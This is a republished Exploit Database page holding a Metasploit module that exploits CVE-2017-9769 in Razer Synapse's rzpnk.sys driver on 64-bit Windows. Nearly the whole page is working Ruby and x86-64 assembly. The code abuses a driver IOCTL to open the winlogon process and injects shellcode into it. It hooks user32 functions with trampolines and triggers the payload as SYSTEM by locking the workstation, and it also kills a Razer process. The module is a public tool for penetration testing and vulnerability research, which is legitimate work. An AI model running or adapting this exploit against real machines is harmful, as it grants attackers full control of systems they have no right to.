Razer Synapse 2.20.15.1104 – rzpnk.sys ZwOpenProcess (Metasploit)

• Exploit Database
• 45 阅读

• 作者： Metasploit
  日期： 2017-07-24
• 类别：

  • local
  平台：

  • windows_x86-64
• 来源：https://www.exploit-db.com/exploits/42368/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core/exploit/local/windows_kernel'
  require 'rex'
  require 'metasm'
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::Windows::Priv
  
  # the max size our hook can be, used before it's generated for the allocation
  HOOK_STUB_MAX_LENGTH = 256
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess',
  'Description'=> %q{
  A vulnerability exists in the latest version of Razer Synapse
  (v2.20.15.1104 as of the day of disclosure) which can be leveraged
  locally by a malicious application to elevate its privileges to those of
  NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
  in the rzpnk.sys driver that passes a PID specified by the user to
  ZwOpenProcess. This can be issued by an application to open a handle to
  an arbitrary process with the necessary privileges to allocate, read and
  write memory in the specified process.
  
  This exploit leverages this vulnerability to open a handle to the
  winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
  installing a hook to execute attacker controlled shellcode. This hook is
  then triggered on demand by calling user32!LockWorkStation(), resulting
  in the attacker's payload being executed with the privileges of the
  infected winlogon process. In order for the issued IOCTL to work, the
  RazerIngameEngine.exe process must not be running. This exploit will
  check if it is, and attempt to kill it as necessary.
  
  The vulnerable software can be found here:
  https://www.razerzone.com/synapse/. No Razer hardware needs to be
  connected in order to leverage this vulnerability.
  
  This exploit is not opsec-safe due to the user being logged out as part
  of the exploitation process.
  },
  'Author' => 'Spencer McIntyre',
  'License'=> MSF_LICENSE,
  'References' => [
  ['CVE', '2017-9769'],
  ['URL', 'https://warroom.securestate.com/cve-2017-9769/']
  ],
  'Platform' => 'win',
  'Targets'=>
  [
  # Tested on (64 bits):
  # * Windows 7 SP1
  # * Windows 10.0.10586
  [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
  ],
  'DefaultOptions' =>
  {
  'EXITFUNC' => 'thread',
  'WfsDelay' => 20
  },
  'DefaultTarget'=> 0,
  'Privileged' => true,
  'DisclosureDate' => 'Mar 22 2017'))
  end
  
  def check
  # Validate that the driver has been loaded and that
  # the version is the same as the one expected
  client.sys.config.getdrivers.each do |d|
  if d[:basename].downcase == 'rzpnk.sys'
  expected_checksum = 'b4598c05d5440250633e25933fff42b0'
  target_checksum = client.fs.file.md5(d[:filename])
  
  if expected_checksum == Rex::Text.to_hex(target_checksum, '')
  return Exploit::CheckCode::Appears
  else
  return Exploit::CheckCode::Detected
  end
  end
  end
  
  Exploit::CheckCode::Safe
  end
  
  def exploit
  if is_system?
  fail_with(Failure::None, 'Session is already elevated')
  end
  
  if check == Exploit::CheckCode::Safe
  fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
  end
  
  if session.platform != 'windows'
  fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
  elsif session.arch != ARCH_X64
  fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
  end
  
  pid = session.sys.process['RazerIngameEngine.exe']
  if pid
  # if this process is running, the IOCTL won't work but the process runs
  # with user privileges so we can kill it
  print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")
  session.sys.process.kill(pid)
  end
  
  pid = session.sys.process['winlogon.exe']
  print_status("Found winlogon pid: #{pid}")
  
  handle = get_handle(pid)
  fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
  vprint_status('Successfully opened a handle to the winlogon process')
  
  winlogon = session.sys.process.new(pid, handle)
  allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH
  shellcode_address = winlogon.memory.allocate(allocation_size)
  winlogon.memory.protect(shellcode_address)
  print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}")
  winlogon.memory.write(shellcode_address, payload.encoded)
  hook_stub_address = shellcode_address + payload.encoded.length
  
  result = session.railgun.kernel32.LoadLibraryA('user32')
  fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0
  user32_handle = result['return']
  
  # resolve and backup the functions that we'll install trampolines in
  user32_trampolines = {}# address => original chunk
  user32_functions = ['LockWindowStation']
  user32_functions.each do |function|
  address = get_address(user32_handle, function)
  winlogon.memory.protect(address)
  user32_trampolines[function] = {
  address:address,
  original: winlogon.memory.read(address, 24)
  }
  end
  
  # generate and install the hook asm
  hook_stub = get_hook(shellcode_address, user32_trampolines)
  fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
  # if this happens, there was a programming error
  fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH
  
  winlogon.memory.write(hook_stub_address, hook_stub)
  vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")
  
  # install the asm trampolines to jump to the hook
  user32_trampolines.each do |function, trampoline_info|
  address = trampoline_info[:address]
  trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{
  movrax, 0x#{address.to_s(16)}
  push rax
  movrax, 0x#{hook_stub_address.to_s(16)}
  jmprax
  }).encode_string
  winlogon.memory.write(address, trampoline)
  vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}")
  end
  
  session.railgun.user32.LockWorkStation()
  session.railgun.kernel32.CloseHandle(handle)
  end
  
  def get_address(dll_handle, function_name)
  result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)
  fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0
  result['return']
  end
  
  # this is where the actual vulnerability is leveraged
  def get_handle(pid)
  handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
  return nil unless handle
  vprint_status('Successfully opened a handle to the driver')
  
  buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')
  
  session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[
  ['DWORD','FileHandle', 'in' ],
  ['DWORD','Event','in' ],
  ['LPVOID', 'ApcRoutine', 'in' ],
  ['LPVOID', 'ApcContext', 'in' ],
  ['PDWORD', 'IoStatusBlock','out'],
  ['DWORD','IoControlCode','in' ],
  ['PBLOB','InputBuffer','in' ],
  ['DWORD','InputBufferLength','in' ],
  ['PBLOB','OutputBuffer', 'out'],
  ['DWORD','OutputBufferLength', 'in' ],
  ])
  result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)
  return nil if result['return'] != 0
  session.railgun.kernel32.CloseHandle(handle)
  
  result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]
  end
  
  def get_hook(shellcode_address, restore)
  dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']
  return nil if dll_handle == 0
  create_thread_address = get_address(dll_handle, 'CreateThread')
  
  stub = %{
  call main
  ; restore the functions where the trampolines were installed
  push rbx
  }
  
  restore.each do |function, trampoline_info|
  original = trampoline_info[:original].unpack('Q*')
  stub << "movrax, 0x#{trampoline_info[:address].to_s(16)}"
  original.each do |chunk|
  stub << %{
  movrbx, 0x#{chunk.to_s(16)}
  movqword ptr ds:[rax], rbx
  addrax, 8
  }
  end
  end
  
  stub << %{
  poprbx
  ret
  
  main:
  ; backup registers we're going to mangle
  push r9
  push r8
  push rdx
  push rcx
  
  ; setup the arguments for the call to CreateThread
  xorrax, rax
  push rax; lpThreadId
  push rax; dwCreationFlags
  xorr9, r9 ; lpParameter
  movr8, 0x#{shellcode_address.to_s(16)}; lpStartAddress
  xorrdx, rdx ; dwStackSize
  xorrcx, rcx ; lpThreadAttributes
  movrax, 0x#{create_thread_address.to_s(16)} ; &CreateThread
  
  call rax
  addrsp, 16
  
  ; restore arguments that were mangled
  poprcx
  poprdx
  popr8
  popr9
  ret
  }
  Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string
  end
  end